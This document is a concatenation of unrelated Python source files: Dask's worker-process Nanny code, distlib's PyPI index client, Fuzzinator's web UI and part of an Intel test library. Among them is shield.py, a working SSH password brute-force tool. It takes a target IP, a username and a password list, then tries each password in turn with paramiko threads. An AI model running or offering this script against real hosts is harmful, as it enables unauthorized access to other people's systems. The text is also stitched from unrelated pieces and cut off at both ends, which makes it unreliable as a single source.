logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
self.status = Status.failed
return self.status
try:
msg = await self._wait_until_connected(uid)
except Exception:
self.status = Status.failed
self.process.terminate()
raise
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
self.status = Status.running
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
while True:
if self.status != Status.starting:
return
# This is a multiprocessing queue and we'd block the event loop if
# we simply called get
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(self._init_msg_interval)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
try:
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=True,
nanny=False,
safe=True, # TODO: Graceful or not?
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
                    # If we hit an exception here we need to wait for at least
# one interval for the outside to pick up this message.
# Otherwise we arrive in a race condition where the process
# cleanup wipes the queue before the exception can be
# properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good
# measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
except Exception as e:
logger.exception("Failed to initialize Worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
            # If we hit an exception here we need to wait for at least one
# interval for the outside to pick up this message. Otherwise we
# arrive in a race condition where the process cleanup wipes the
# queue before the exception can be properly handled. See also
# WorkerProcess._wait_until_connected (the 2 is for good measure)
sync_sleep(cls._init_msg_interval * 2)
else:
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
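# Illustrative sketch (not part of distributed): starting a Nanny next to a
# scheduler. The port and thread count are example assumptions.
#
# import asyncio
# from distributed import Scheduler
#
# async def main():
#     async with Scheduler(port=8786) as scheduler:
#         async with Nanny(scheduler.address, nthreads=1) as nanny:
#             print("worker process registered at", nanny.worker_address)
#
# asyncio.run(main())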
|
shield.py
|
import paramiko
import os
import sys
import socket
import threading, time
from termcolor import colored
exit_tag = 0
shield = '''
,----. ,-. ,----.,------. ,-. ,-.,-. ,-.
/ ,-,_/ ,' | / / /`-, ,-',' | / // |/ /
/ / __ ,' ,| | / ,---' / / ,' ,| | / // / /
/ '-' /,' ,--. |/ / / /,' ,--. |/ // /| /
`----''--' `-'`'.--""""--.--' `-'`' `' `-'
nnnnnnnnnnnnnnnn,'.n*""""*N.`.#######################
NNNNNNNNNNNNNNN/ J',n*""*n.`L \##### ### ### ### ####
: J J___/\___L L :#####################
nnnnnnnnnnnnnn{ [{ `SHIELD.' }] }## ### ### ### ### ##
NNNNNNNNNNNNNN: T T /,'`.\ T J :#####################
\ L,`*n,,n*',J /
nnnnnnnnnnnnnnnn`. *n,,,,n* ,'nnnnnnnnnnnnnnnnnnnnnnn
NNNNNNNNNNNNNNNNNN`-..__..-'NNNNNNNNNNNNNNNNNNNNNNNNN
,-. ,-. ,-. ,----. ,----.,-. ,----. ,-.
| `. \ `.| \\ .--`\ \"L \\ \\ .-._\ | `.
| |. `. \ \ ` L \\ __\ \ . < \ \\ \ __ | |. `.
| .--. `.\ \`-'\ \\ `---.\ \L `.\ \\ `-` \| .--. `.
`-' `--``' `-'`----' `-'`-' `' `----'`-' `--'
'''
logo = '''
,----. ,-. ,----.,------. ,-. ,-.,-. ,-.
/ ,-,_/ ,' | / / /`-, ,-',' | / // |/ /
/ / __ ,' ,| | / ,---' / / ,' ,| | / // / /
/ '-' /,' ,--. |/ / / /,' ,--. |/ // /| /
`----''--' `-'`'.--""""--.--' `-'`' `' `-'
nnnnnnnnnnnnnnnn,'.n*""""*N.`.#######################
NNNNNNNNNNNNNNN/ J',n*""*n.`L \##### ### ### ### ####
: J J___/\___L L :#####################
nnnnnnnnnnnnnn{ [{ `. ,' }] }## ### ### ### ### ##
NNNNNNNNNNNNNN: T T /,'`.\ T J :#####################
\ L,`*n,,n*',J /
nnnnnnnnnnnnnnnn`. *n,,,,n* ,'nnnnnnnnnnnnnnnnnnnnnnn
NNNNNNNNNNNNNNNNNN`-..__..-'NNNNNNNNNNNNNNNNNNNNNNNNN
,-. ,-. ,-. ,----. ,----.,-. ,----. ,-.
| `. \ `.| \\ .--`\ \"L \\ \\ .-._\ | `.
| |. `. \ \ ` L \\ __\ \ . < \ \\ \ __ | |. `.
| .--. `.\ \`-'\ \\ `---.\ \L `.\ \\ `-` \| .--. `.
`-' `--``' `-'`----' `-'`-' `' `----'`-' `--'
------------------------------------------------
By Emre Koybasi https://github.com/emrekybs
'''
print(logo)
time.sleep(1.5)
print("\n SHIELD SSH Attack Starting...")
os.system("notify-send 'Shield Successfully initiated'")
time.sleep(2)
if len(sys.argv) != 4:
print(colored("\n[*]usage python3 shield.py <Target Ip> <username> <password-file>\n\n", 'white', attrs=['reverse', 'blink']))
sys.exit(0)
target_ip = sys.argv[1]
username = sys.argv[2]
password_file = sys.argv[3]
def ssh_connect(password, code=0):
global exit_tag
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(target_ip, port=22, username=username, password=password)
exit_tag = 1
print(colored(f"\n[+]SSH Password For {username} found :> {password} {shield}\n", "green", attrs=['bold']))
os.system(f"notify-send 'Password Found::{password}'")
    except Exception:
        print(colored(f"[!]Incorrect SSH password:> {password}", 'red'))
    finally:
        ssh.close()
    return code
if os.path.exists(password_file) == False:
print(colored("[!] File Not Found", 'red'))
sys.exit(1)
with open(password_file, 'r') as file:
for line in file.readlines():
if exit_tag == 1:
t.join()
exit()
password = line.strip()
t = threading.Thread(target=ssh_connect, args=(password,))
t.start()
time.sleep(0.2)
|
index.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (HTTPBasicAuthHandler, Request, HTTPPasswordMgr,
urlparse, build_opener, string_types)
from .util import cached_property, zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = 'https://pypi.org/pypi'
DEFAULT_REALM = 'pypi'
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b'----------ThIs_Is_tHe_distlib_index_bouNdaRY_$'
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ('http', 'https'):
raise DistlibException('invalid repository: %s' % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, 'w') as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ('gpg', 'gpg2'):
try:
rc = subprocess.check_call([s, '--version'], stdout=sink,
stderr=sink)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from distutils.core import Distribution
from distutils.config import PyPIRCCommand
d = Distribution()
return PyPIRCCommand(d)
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils, getting
PyPI to do the actual work. This populates ``username``, ``password``,
``realm`` and ``url`` attributes from the configuration.
"""
# get distutils to do the work
c = self._get_pypirc_command()
c.repository = self.url
cfg = c._read_pypirc()
self.username = cfg.get('username')
self.password = cfg.get('password')
self.realm = cfg.get('realm', 'pypi')
self.url = cfg.get('repository', self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
Again, distutils is used to do the actual work.
"""
self.check_credentials()
# get distutils to do the work
c = self._get_pypirc_command()
c._store_pypirc(self.username, self.password)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException('username and password must be set')
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[':action'] = 'verify'
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[':action'] = 'submit'
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
        Thread runner for reading lines of output from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
        :param stream: The stream to read from. This will typically be a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode('utf-8').rstrip()
outbuf.append(s)
logger.debug('%s: %s' % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password,
keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
if sign_password is not None:
cmd.extend(['--batch', '--passphrase-fd', '0'])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + '.asc')
cmd.extend(['--detach-sign', '--armor', '--local-user',
signer, '--output', sf, filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
        Run a command in a child process, passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
                           data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
'stdout': subprocess.PIPE,
'stderr': subprocess.PIPE,
}
if input_data is not None:
kwargs['stdin'] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=('stdout', p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=('stderr', p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password,
keystore)
rc, stdout, stderr = self.run_command(cmd,
sign_password.encode('utf-8'))
if rc != 0:
raise DistlibException('sign command failed with error '
'code %s' % rc)
return sig_file
def upload_file(self, metadata, filename, signer=None, sign_password=None,
filetype='sdist', pyversion='source', keystore=None):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException('not found: %s' % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning('no signing program available - not signed')
else:
sig_file = self.sign_file(filename, signer, sign_password,
keystore)
with open(filename, 'rb') as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update({
':action': 'file_upload',
'protocol_version': '1',
'filetype': filetype,
'pyversion': pyversion,
'md5_digest': md5_digest,
'sha256_digest': sha256_digest,
})
files = [('content', os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, 'rb') as f:
sig_data = f.read()
files.append(('gpg_signature', os.path.basename(sig_file),
sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException('not a directory: %r' % doc_dir)
fn = os.path.join(doc_dir, 'index.html')
if not os.path.exists(fn):
raise DistlibException('not found: %r' % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(':action', 'doc_upload'),
('name', name), ('version', version)]
files = [('content', name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename,
keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
                              signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, '--status-fd', '2', '--no-tty']
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(['--homedir', keystore])
cmd.extend(['--verify', signature_filename, data_filename])
logger.debug('invoking: %s', ' '.join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename,
keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
                              signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException('verification unavailable because gpg '
'unavailable')
cmd = self.get_verify_command(signature_filename, data_filename,
keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException('verify command failed with error '
'code %s' % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
        done during download and checking that the downloaded data
        matches any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug('No digest specified')
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = 'md5'
digester = getattr(hashlib, hasher)()
logger.debug('Digest specified: %s' % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, 'wb') as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
'retrieval incomplete: got only %d out of %d bytes'
% (read, size))
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException('%s digest mismatch for %s: expected '
'%s, got %s' % (hasher, destfile,
digest, actual))
logger.debug('Digest verified: %s', digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
                      file_bytes) tuples.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend((
b'--' + boundary,
                    ('Content-Disposition: form-data; name="%s"' %
k).encode('utf-8'),
b'',
v.encode('utf-8')))
for key, filename, value in files:
parts.extend((
b'--' + boundary,
                ('Content-Disposition: form-data; name="%s"; filename="%s"' %
(key, filename)).encode('utf-8'),
b'',
value))
parts.extend((b'--' + boundary + b'--', b''))
body = b'\r\n'.join(parts)
        ct = b'multipart/form-data; boundary=' + boundary
headers = {
'Content-type': ct,
'Content-length': str(len(body))
}
return Request(self.url, body, headers)
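    # Illustrative usage (not part of the original module; field names and
    # values are placeholders): fields is a list of (name, value) pairs and
    # files a list of (name, filename, bytes) triples, e.g.
    #   req = index.encode_request([('name', 'pkg'), ('version', '1.0')],
    #                              [('content', 'pkg-1.0.tar.gz', b'...')])
    # The returned Request carries a multipart/form-data body.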
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {'name': terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or 'and')
finally:
rpc_proxy('close')()
|
wui.py
|
# Copyright (c) 2019 Tamas Keri.
# Copyright (c) 2019-2021 Renata Hodovan, Akos Kiss.
#
# Licensed under the BSD 3-Clause License
# <LICENSE.rst or https://opensource.org/licenses/BSD-3-Clause>.
# This file may not be copied, modified, or distributed except
# according to those terms.
import logging
import os
import signal
import sys
from multiprocessing import Lock, Manager, Process, Queue
from pkg_resources import resource_filename
from rainbow_logging_handler import RainbowLoggingHandler
from tornado import ioloop, web
from ... import Controller
from .api_handlers import IssueAPIHandler, IssueReportAPIHandler, IssuesAPIHandler, JobAPIHandler, JobsAPIHandler, NotFoundAPIHandler, StatsAPIHandler
from .ui_handlers import ConfigUIHandler, IssueReportUIHandler, IssuesUIHandler, IssueUIHandler, NotFoundHandler, NotificationsHandler, StatsUIHandler
from .wui_listener import WuiListener
logger = logging.getLogger(__name__)
root_logger = logging.getLogger()
class Wui(object):
def __init__(self, controller, port, address, debug):
self.events = Queue()
self.lock = Lock()
# Main controller of Fuzzinator.
self.controller = controller
self.controller.listener += WuiListener(self.events, self.lock)
# Collection of request handlers that make up a web application.
handler_args = dict(wui=self)
self.app = web.Application([(r'/', IssuesUIHandler, handler_args),
(r'/issues/([0-9a-f]{24})', IssueUIHandler, handler_args),
(r'/issues/([0-9a-f]{24})/report', IssueReportUIHandler, handler_args),
(r'/stats', StatsUIHandler, handler_args),
(r'/configs/([0-9a-f]{9})(?:/([0-9a-f]{24}))?', ConfigUIHandler, handler_args),
(r'/notifications', NotificationsHandler, handler_args),
(r'/api/issues', IssuesAPIHandler, handler_args),
(r'/api/issues/([0-9a-f]{24})', IssueAPIHandler, handler_args),
(r'/api/issues/([0-9a-f]{24})/report', IssueReportAPIHandler, handler_args),
(r'/api/jobs', JobsAPIHandler, handler_args),
(r'/api/jobs/([0-9]+)', JobAPIHandler, handler_args),
(r'/api/stats', StatsAPIHandler, handler_args),
(r'/api/.*', NotFoundAPIHandler)],
default_handler_class=NotFoundHandler, default_handler_args=handler_args,
template_path=resource_filename(__name__, os.path.join('resources', 'templates')),
static_path=resource_filename(__name__, os.path.join('resources', 'static')),
autoreload=False, debug=debug)
# Starts an HTTP server for this application on the given port.
self.server = self.app.listen(port, address)
# List of opened WebSockets.
self.sockets = set()
# Share dict between processes.
self.jobs = Manager().dict()
def update_ui(self):
while True:
try:
event = self.events.get_nowait()
if hasattr(self, event['fn']):
getattr(self, event['fn'])(**event['kwargs'])
except Exception:
break
def register_ws(self, socket):
self.sockets.add(socket)
def unregister_ws(self, socket):
if socket in self.sockets:
self.sockets.remove(socket)
def stop_ws(self):
for socket in self.sockets:
socket.close()
def send_notification(self, action, data=None):
for socket in self.sockets:
socket.send_notification(action, data)
def on_job_added(self, type, **kwargs):
job = kwargs
job.update(type=type, status='inactive')
self.jobs[job['ident']] = job
self.send_notification('job_added', job)
def on_fuzz_job_added(self, **kwargs):
self.on_job_added('fuzz', **kwargs)
def on_reduce_job_added(self, **kwargs):
self.on_job_added('reduce', **kwargs)
def on_update_job_added(self, **kwargs):
self.on_job_added('update', **kwargs)
def on_validate_job_added(self, **kwargs):
self.on_job_added('validate', **kwargs)
def on_job_removed(self, **kwargs):
del self.jobs[kwargs['ident']]
self.send_notification('job_removed', kwargs)
def on_job_activated(self, **kwargs):
job = self.jobs[kwargs['ident']]
job.update(status='active')
self.jobs[kwargs['ident']] = job
self.send_notification('job_activated', kwargs)
def on_job_progressed(self, **kwargs):
job = self.jobs[kwargs['ident']]
job.update(progress=kwargs['progress'])
self.jobs[kwargs['ident']] = job
self.send_notification('job_progressed', kwargs)
def on_issue_added(self, **kwargs):
self.send_notification('issue_added')
self.send_notification('refresh_issues')
def on_issue_updated(self, **kwargs):
self.send_notification('refresh_issues')
def on_issue_invalidated(self, **kwargs):
self.send_notification('refresh_issues')
def on_issue_reduced(self, **kwargs):
self.send_notification('refresh_issues')
def on_stats_updated(self, **kwargs):
self.send_notification('refresh_stats')
def warning(self, ident, msg):
logger.warning(msg)
def execute(arguments):
if not root_logger.hasHandlers():
root_logger.addHandler(RainbowLoggingHandler(sys.stdout))
    # The INFO level of Tornado's access logging is too chatty, hence those
    # messages are not displayed at the INFO level.
if root_logger.getEffectiveLevel() == logging.INFO:
logging.getLogger('tornado.access').setLevel(logging.WARNING)
logger.info('Server started at: http://%s:%d', arguments.bind_ip or 'localhost', arguments.port)
controller = Controller(config=arguments.config)
wui = Wui(controller, arguments.port, arguments.bind_ip, arguments.develop)
fuzz_process = Process(target=controller.run, args=(), kwargs={'max_cycles': arguments.max_cycles, 'validate': arguments.validate, 'reduce': arguments.reduce})
iol = ioloop.IOLoop.instance()
iol_clb = ioloop.PeriodicCallback(wui.update_ui, 1000)
try:
fuzz_process.start()
iol_clb.start()
iol.start()
except KeyboardInterrupt:
# No need to handle CTRL+C as SIGINT is sent by the terminal to all
# (sub)processes.
pass
except Exception as e:
        # Handle every kind of WUI exception except for KeyboardInterrupt.
# SIGINT will trigger a KeyboardInterrupt exception in controller,
# thus allowing it to perform proper cleanup.
os.kill(fuzz_process.pid, signal.SIGINT)
logger.error('Unhandled exception in WUI.', exc_info=e)
else:
# SIGINT will trigger a KeyboardInterrupt exception in controller,
# thus allowing it to perform proper cleanup.
os.kill(fuzz_process.pid, signal.SIGINT)
finally:
wui.stop_ws()
iol_clb.stop()
iol.add_callback(iol.stop)
|
common3.py
|
# Copyright (c) 2011 - 2017, Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""``common3.py``
`Testlib common functionality version 3.x`
"""
# Python built-in imports
import sys
import json
import os
import itertools
import traceback
from threading import Thread
import pytest
# Testlib imports
from .custom_exceptions import TAFCoreException
from . import entry_template
from . import environment
from . import loggers
VERSION = "3.0"
# Accessible from other modules list of loaded classes from dev_ files.
custom_classes = {}
# Add soft exit with environment sanitizing before exit.
def softexit(message, env=None):
"""Sanitizing environment and exit py.test execution.
Args:
message(str): Exit message
env(Environment): Environment instance
"""
if env is not None:
env.sanitize()
pytest.exit(message)
pytest.softexit = softexit
# Environment is inherited from dict to provide backward compatibility with TAFv1 suites
class Environment(dict):
"""Main class of all test environment.
Notes:
This class has to be used as base fixture in all test cases.
It provides number of common methods to initialize, shutdown,
cleanup environment functions which basically call appropriate methods of particular device classes.
"""
class_logger = loggers.ClassLogger()
def __init__(self, opts=None, **kwargs):
"""Read configuration files and create device objects.
Args:
opts(OptionParser): py.test config.option object which contains all py.test cli options.
Raises:
TAFCoreException: unexpected entry_type
"""
super(Environment, self).__init__(**kwargs)
self.opts = opts
self._dict = {}
self.config = self._get_conf(self.opts.env)
self.setup = {}
if self.opts.setup:
self.setup = self._get_setup(self.opts.setup)
# Map acroname to conf id
self.dut_map = {}
# Map config Id to instance index
self.id_map = {}
# Environment properties
self.env_prop = {}
# Device classes
self.__dev = {}
# Map autoname to conf Id
self.autoname_map = {}
# Get device classes
device_module_names = self._find_dev_modules()
self._import_device_modules(device_module_names)
# Make loaded classes from dev_ file accessible for other modules
for key, value in self.__dev.items():
custom_classes[key] = value
# Create env config according to setup
new_config = [self.create_conf_entry(setup_entry) for setup_entry in self.setup['env']]
# create a set from related ids lists
related_ids = set(itertools.chain.from_iterable(
conf_entry.get('related_id', []) for conf_entry in new_config))
# Add related config entries from environment config if they are not already in new_config
new_config_ids = set(_x['id'] for _x in new_config)
# find the unadded related_ids.
new_related_ids = related_ids - new_config_ids
related_configs = [
next(_e for _e in self.config if _e['id'] == rid) for rid in new_related_ids]
new_config.extend(related_configs)
# Save updated config
self.config = new_config
self.class_logger.info("Preparing environment objects.")
# reading and appending config and creating instances
for entry in self.config:
self.class_logger.info(
"Creating {0}:{1}:{2}".format(entry['entry_type'], entry['instance_type'],
entry['id']))
# Append related configs
if "related_id" in entry:
entry['related_conf'] = self._append_related_confs(entry['related_id'])
# Creating setup entries instances
try:
ename = self.__dev[entry['entry_type']]['NAME']
except KeyError:
message = ("Unexpected value for entry_type: '%s' specified with id: '%s' " +
"added in config.") % (entry['entry_type'], entry['id'])
raise TAFCoreException(message)
# always create a switch objects so that
